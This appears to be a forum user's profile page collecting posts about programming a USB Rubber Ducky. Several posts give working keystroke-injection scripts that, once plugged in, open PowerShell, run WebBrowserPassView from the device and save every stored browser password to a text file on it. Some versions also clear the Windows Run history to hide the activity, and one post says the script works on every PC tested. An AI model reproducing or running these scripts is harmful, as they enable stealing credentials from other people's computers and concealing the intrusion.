Jump to content

macroliux

Active Members
  • Content Count

    11
  • Joined

  • Last visited

Everything posted by macroliux

  1. More info on it here: https://www.hak5.org/blog/main-blog/stealing-files-with-the-usb-rubber-ducky-usb-exfiltration-explained
  2. Do you have the twin duck firmware flashed to the ducky? You have to have that done so it can use the sd card like a usb thumb drive to be able to save the file to the duck.
  3. Nice, glad you got it working. I know it gets frustrating at times. lol
  4. Oh, I also forgot to mention that you have to download the WebBrowserPassView.exe from the nirsoft site that supports command line options as the regular version you download does not. Instructions on how to download that are on this site: https://www.nirsoft.net/password_recovery_tools.html
  5. This is the final code I've ended up with that works for me on every PC I've tested it on (about 6). REM opens powershell DELAY 5000 GUI r DELAY 2000 STRING powershell ENTER DELAY 100 REM navigates to USB drive called _ for me STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq '_' } | select name ENTER DELAY 500 STRING cd $usbPath.name ENTER DELAY 200 REM runs WebrowserPassView from ducky drive STRING CMD ENTER DELAY 200 STRING WebBrowserPassView.exe /stext pass_%computername%.txt ENTER DELAY 1000 STRING exit ENTER DELAY 50
  6. Thanks for the tip! I did that and it worked. So I messed with the delays a little to get it a little faster until it stopped working again. This is what I ended up with that works when you plug it in. REM opens powershell DELAY 5000 GUI r DELAY 2000 STRING powershell ENTER DELAY 100 REM navigates to USB drive called _ for me STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq '_' } | select name ENTER DELAY 500 STRING cd $usbPath.name ENTER DELAY 200 REM runs WebrowserPassView from ducky drive STRING CMD ENTER DELAY 200 STRING WebBro
  7. Hi All, I've only had this ducky for a week and it's like it has a mind of it's own. I had it working when you plug it in to gather all the browser passwords and save to a text file on the sd card using the twin duck firmware. For some reason it stopped working. I mean it would run some of the commands to get powershell up but wouldnt' finish and therefore not create the .txt file you're expecting. So I reflashed it and put the code back on and now it will work correctly when pushing the button on the ducky to execute the inject.bin file. However, it still doesn't work right when plugging in.
  8. I just got the script working this morning. I had to download the WebBrowserPassView program that supports command line. After that I was able to append a switch to the command telling it to save the output as a .txt file. Here's the code that works for me. REM opens powershell DELAY 1000 GUI r DELAY 100 STRING powershell ENTER DELAY 500 REM navigates to USB drive called _ for me STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq '_' } | select name ENTER DELAY 500 STRING cd $usbPath.name ENTER DELAY 500 REM runs WebrowserPassView from ducky
  9. Hi, new to the ducky world and have been researching and reading as much as I can fine. The issue I need help with is that the ducky launches powershell and then the program I tell it to, but the keyboard commands to highlight the text and save file doesn't work. Here's the commands I'm running: REM opens powershell DELAY 1000 GUI r DELAY 100 STRING powershell ENTER DELAY 500 REM removes run history STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER D
  10. Hi, I was wondering if you ever found an answer? I have the same issue. The ducky launches powershell and then my program but the keyboard commands to highlight the text and save file doesn't work. Here's the commands I'm running: REM opens powershell DELAY 1000 GUI r DELAY 100 STRING powershell ENTER DELAY 500 REM removes run history STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER DELAY 200 REM navigates to USB drive called _ for me STRING $usbPath = Get-W
×
×
  • Create New...